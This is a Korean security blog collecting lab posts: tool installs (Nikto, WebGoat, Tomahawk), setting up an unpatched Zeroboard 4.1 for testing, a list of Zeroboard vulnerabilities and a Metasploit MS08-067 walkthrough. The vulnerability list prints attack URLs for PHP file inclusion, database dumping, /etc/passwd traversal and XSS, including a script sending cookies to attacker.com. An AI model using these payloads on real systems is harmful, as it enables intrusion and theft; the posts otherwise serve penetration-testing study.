[Proxy Tool] Burp Suite v1.5 Released






지난 10월 31일 Burp Suite Free Edition v1.5가 릴리즈 되었습니다.



관련링크 : http://blog.portswigger.net/2012/10/burp-suite-free-edition-v15-released.html



무료 다운로드 링크 : http://portswigger.net/burp/download.html





저작자 표시 비영리 동일 조건 변경 허락
신고

[취약점분석도구] Linux에서 Nikto를 사용하여 웹서버 취약점 분석하기

nikto라는 공개소프트웨어를 통해서 리눅스 서버에서 웹서버의 취약점을 분석할 수 있습니다.


# 설치방법

1. Nikto 다운로드
wget https://cirt.net/nikto/nikto-2.1.4.tar.gz


2. 다운로드된 파일을 압축해제 후 실행합니다.
tar xvfz nikto-2.1.4.tar.gz
cd nikto-2.1.4

perl로 실행되므로 perl을 다운로드 합니다.
yum install perl

./nikto.pl -h www.test.com -Cgidirs all -output test_site.html -Format html -Display on
로 실행합니다.

 




# 설치가이드문서
http://cirt.net/nikto2-docs/installation.html#id2727109


# 스캔된 웹서버 access_log 화면


저작자 표시
신고

[제로보드] 리눅스에 제로보드 4.1 pl2 설치하기

사이트 PT 시연(?)이 있어서 리눅스에 제로보드를 설치해봤습니다.
(물론 제로보드는 보안패치가 전혀 안 된 4.1버전 입니다. ^_^)

1. 리눅스를 설치합니다.
(4.1의 mysql과 php 버전을 생각하여 CentOS 4 버전 대역으로 설치하였습니다.)



2. 필요 패키지를 설치합니다.
(yum을 통하여 필요 패키지를 설치하였습니다.)
# yum -y install httpd mysql mysql-server php php-mysql



3. http와 mysql 서비스를 시작 합니다.
# service httpd start ; service mysqld start



4. 제로보드 4.1 pl2 버전의 압축을 풉니다.
    가. 해당 경로에 zb41pl2.tar.Z 파일 복사
    나. 압축 해제
    # tar xvfz zb41pl2.tar.Z
    다. 필요에 따라 경로 변경



5. 인코딩 문제를 해결하기 위한 작업을 합니다.
    # 해당 작업을 안 하면 install.php 화면에서 글자가 깨집니다.
    # 압축 해제된 제로보드 파일의 인코딩을 utf-8로 변경함 (RedUTF8.exe의 UTF8 Encode 사용)
    # 변경된 파일을 /var/www/html에 옮겨 놓았습니다.



6. DB 스키마 정보를 변경합니다.
   # 4.1 pl2 버전에서는 DB가 생성이 되지 않아, 4.1 pl8 버전의 schema.sql 파일로 overwrite 했습니다.



7. 다른 몇 가지 설정을 합니다.
   # install.php에서 무한 로그인 현상 해결
     /etc/php.ini에 session.bug_compat_42 = 1 로 수정



   # 게시판 한글 깨지는 현상 관련 mysql 문자셋 설정
     /etc/my.cnf에 다음과 같이 수정


  # admin.php에서 계정정보 넣은 후 로그인이 되지 않는 현상
    /etc/php.ini에 register_globals = On으로 수정



# 위 3개 항목 수정 후 http 데몬을 재 시작 합니다.
# service httpd restart

8. DB를 설정합니다.
# mysql -u root -p
(엔터)
mysql> use mysql;
mysql> insert into user (host, user, password) values ('localhost', 'zerotest', password('1234qwer'));
mysql> create database pt;
mysql> insert into db values('localhost', 'pt', 'zerotest', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y');
mysql> flush privileges;



9. 이제 설정은 모두 끝났습니다. UI를 띄웁니다.
http://192.168.0.130/install.php



10. 아까 8번에서 설정한 정보를 넣습니다.
(원래 이런 과정은 안 거쳐도 되지만...mysql 호환성 문제로 강제로 세팅하였습니다. ㅜㅜ)



11. 원하시는 계정정보를 넣습니다.



12. 관리자 권한으로 로그인하여 게시판을 만듭니다.



13. 이제 관리자 화면의 매뉴얼(^^)을 확인하여 게시판을 만듭니다~



# 궁금하신 사항은 리플 주세염~ ^_^


저작자 표시
신고
  1. 냠냠 2010.12.24 12:18 신고

    님...죄송한데요..
    혹시 제로보드 pl1~pl8까지 있으신지요.....
    있으시면 좀 보내주시면 안될련지요.

    • 관우 2011.01.09 12:57 신고

      글쎄요...
      배포는 ZB 규약상 어려운 것 같아서 게시는 못하구요~
      대신 메일 주소 알려주시면 보내 드릴께요~

      비밀글로 등록해주세요~

  2. 2011.07.19 17:53

    비밀댓글입니다

    • 2011.08.05 22:11

      비밀댓글입니다

  3. 2011.12.08 22:56

    비밀댓글입니다

  4. 2013.08.29 02:43

    비밀댓글입니다

  5. 2014.05.25 23:27

    비밀댓글입니다



[WebGoat] WebGoat 설치하기



1. WebGoat 파일을 다운로드 합니다.
http://sourceforge.net/projects/owasp/files/WebGoat/



2. Java SE Development Kit (JDK)을 설치합니다.
http://java.sun.com/javase/downloads/index.jsp



3. 환경 변수를 설정합니다.
"시스템 등록 정보" - "고급" - "환경 변수"



아래와 같은 변수를 넣어 줍니다.



%JAVA_HOME%bin



4. 변수 적용을 위하여 시스템을 재부팅 합니다.



5. webgoat.bat 를 실행한 후, http://localhost/webgoat/attack으로 로그인 합니다.
ID: guest, PW: guest





# 참고)
예전 5.0 버전에서는 http://localhost/WebGoat/attack으로 로그인을 하였지만,
이번 5.3 버전에서는 http://localhost/webgoat/attack으로 로그인 됩니다...^_^




또한 외부에서 webgoat에 접근할 경우,
C:\WebGoat\tomcat\conf 경로에 있는 server_80.xml 파일의 100번째 줄을 시스템의 IP로 수정하면 됩니다.







# 로그인 화면)






저작자 표시
신고


[제로보드] 제로보드 취약점 정리

1. login.php 파일의 PHP Injection 취약점 / pl2 이하
login.php?group_no=1을 실행하여 취약점을 확인한 뒤,
login.php?group_no=1&file=[경로]를 호출하여 공격함

ex) login.php?group_no=1&file=test/injection.txt

<?php
 echo "해킹이 가능합니다.";
?>


2. MySQL DB 덤프 취약점 / pl3 이하
admin_setup.php?_zb_lib_included=true&exec=db_dump&member=1


3. include/write.php 파일의 원격 PHP Injection 취약점 / pl4 이하
05년 호스팅 업체 해킹의 대표적인 사례

<?php
 echo "<? echo \ "해킹이 가능합니다.\"; ?>";
?>

ex) include/write.php?dir=http://[원격 스크립트 주소]

 

4. check_user_id.php 파일의 XSS 취약점 / pl4 이하
check_user_id.php?user_id=<script>alert(document.cookie);</script>

원격지 주소로 쿠키 값을 전송하기
<script> windows.location.href = 'http://attacker.com/write.php?val=' + document:cookie; </script>

 

5. skin/nzeo_vote/error.php 파일의 원격 PHP Injection 취약점 / pl5 이하
3번과 유사


6. 웹서버의 시스템 파일 노출 취약점 / pl5 이하
_head.php?_zb_path=../../../../etc/passwd%00


7. 정규표현식을 우회한 PHP Injection 취약점 / pl5 이하
정규표현식에 Null 문자(\0) 삽입 시 그 문자까지 만을 정규표현식으로 인식하는 PHP의 특성

8. 비밀게시물을 열람할 수 있는 취약점 / pl6  이하
_member_info_included=1 의 변수를 조작하여 비밀글 열람 가능


9. .htaccess 파일업로드 취약점 / pl7 이하
.htaccess 파일이 업로드가 가능함


10. download.php 의 SQL Injection 취약점 / pl7 이하
download 회수를 paros를 통해 HTTP 헤더를 조작하여 변경할 수 있음


11. 쪽지기능의 XSS 취약점 / pl7 이하
쪽지에 XSS를 넣을경우 상대방에게 XSS가 가능함


 

저작자 표시
신고

[IPS] tomahawk를 이용한 IPS 테스팅


토마호크라는 프로그램을 이용하여 IPS를 데모테스팅 할 수 있습니다.


토마호크 설치방법(tomahawk installation)


1. 필요사항
    가. Pentium with 1GHz or faster processor
    나. 512 MB of memory
    다. Red Hat Linux 7.2 or later (or equivalent Linux distribution)
    라. Two (2) gigabit Network Interfaces Cards (NICs) for data, assigned to eth0 and eth1.
         The Intel ProLAN adapters are inexpensive and work great.
    마. One (1) NIC for management, assigned to eth2

2. 설치방법
   가. http://tomahawk.sourceforge.net/tomahawk1.1.gz 에서 패키지를 다운 받습니다.
   나. gzip -d tomahawk1.1.gz으로 해당 패키지의 압축을 풉니다.
   다. chmod +x tomahawk1.1 로 퍼미션 변경 후 실행합니다.

3. 실행방법
   가. tomahawk -l -i eth0 -j eth1 -f test.pcap 등의 명령어로 200~450M의 트래픽을 생성합니다.


[root@localhost bin]# tomahawk1.1 -h

Usage: tomahawk1.1 options
Options affecting all streams:
    -h              Print help and exit
    -Z              Debug mode (multiple -Z's increase)
    -W              Warning mode (enables extra checks and prints out warnings)
    -q              Quiet mode
    -R rate         playback rate in Mbps (default: unlimited
    -m sendGroupSize Maximum number of packets to gather before sending the group (default: 15)
    -w lookahead    Maximum number of packets to examime while gathering the group to send (default: 500)
    -i interface1   Interface to send packets on
    -j interface2   Interface to send packets on
    -a startIpAddr  First IP address for mapped IPs
    -N maxActive    Max simultaneously active handlers
    -s startId      Lowest hadler ID to use (default: 1)
    -e endId        Highest handler ID to use (default: 251)
    -L logFile      Run in logMode and log packets that time out to logFile (- is STDOUT).

Options individual streams (handlers):
    -A (0|1)        Modify IP addresses (default: true)
    -d              Randomize lower 2 bytes of IP address (use only when the pcap has 2 IPs in it.)
    -t timeout      Timeout for one packet(ms)
    -r retrans      Number of retransmission
    -n maxActive    Max number of handlers for a file
    -l loops        Number of times to replay file
    -f file         Pcap file to play




상기와 같은 옵션으로 테스트를 진행하면 됩니다.



출처 :  http://tomahawk.sourceforge.net/


저작자 표시
신고

[MS08-067] Exploit Test

BackTrack4를 통해서 MS08-067 익스플로잇을 테스팅할 수 있습니다.

1. BT4를 구동하여 로그인합니다. (root/toor)

2. cd ../pentest/exploits/framework3

3. ./msfconsole 을 실행합니다. (조금 시간이 걸리네요...)


4. use windows/smb/ms08_067_netapi     //exploit 모듈을 로딩합니다.

5. set payload windows/meterpreter/bind_tcp

6. set RHOST 192.168.0.35     //테스팅 대상의 IP를 넣습니다.

7. exploit     //익스플로잇을 진행합니다.


8. 결과 ; 물론 Victim은 패치가 되지 않은 윈도우를 대상으로 하였습니다.

저작자 표시
신고

모의해킹 사이트 입니다.

해킹 연습에 도움을 줄 가상 은행 사이트이네염 

http://demo.testfire.net


신고

+ Recent posts